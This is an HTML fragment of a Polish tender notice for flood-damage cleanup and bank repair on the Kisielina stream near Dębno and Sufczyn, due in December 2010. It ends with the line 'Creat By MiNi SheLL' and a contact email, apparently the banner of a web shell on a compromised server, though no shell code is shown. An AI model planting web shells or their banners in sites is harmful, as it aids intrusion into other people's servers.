ubezpieczeń z koszy siatkowo-kamiennych-63m3. Likwidacja zatorów w korycie potoku. Usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony)- wywiezienie zanieczyszczeń samochodami na odległość do 1km, złożenie na terenie działki gminnej z przeznaczeniem do wykorzystania przez Sołectwo Wsi Dębno-100,8m3. Mechaniczne karczowanie pni o różnych średnicach. Wydobycie pnia, zasypanie dołu-18szt. Transport karpiny poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-6,14mp.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usuwanie szkód powodziowych na potoku Kisielina w km 39+750-40+500  m. Sufczyn, gm. Dębno, pow. brzeski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczne ścinanie i karczowanie krzaków i podszyć średniej gęstości. Odrąbanie drobnych gałęzi i ułożenie 
w stosy-0,375ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni i kory (bez wrzosu), zgrabienie na stosy drobnych gałęzi z wywiezieniem poza teren obiektu na odległość do 2 km w miejsce  wskazane przez inwestora i spalenie-5500m2. Ścinanie piłą mechaniczną drzew o różnych średnicach, obcięcie gałęzi, ułożenie w stosy-182szt. Transport gałęzi poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-66,34mp. Ręczne usuwanie namułu grubości 0,20m na długości-750m. Ręczne usunięcie nawisów na skarpach potoku z ziemi bez roślinności. Przerzucenie urobku w wyrwy lub poza górną krawędź skarpy-750m2. Uzupełnienie narzutu kamiennego luzem z brzegu, wyładunek mechaniczny-27m3. Naprawa istniejących ubezpieczeń z koszy siatkowo-kamiennych-30m3. Likwidacja zatorów w korycie potoku. Usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony) - wywiezienie zanieczyszczeń samochodami na odległość do 1km, złożenie na terenie działki gminnej z przeznaczeniem do wykorzystania przez Sołectwo Wsi Sufczyn-35m3. Mechaniczne karczowanie pni o różnych średnicach. Wydobycie pnia, zasypanie dołu-29szt. Transport karpiny poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-6,14mp.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com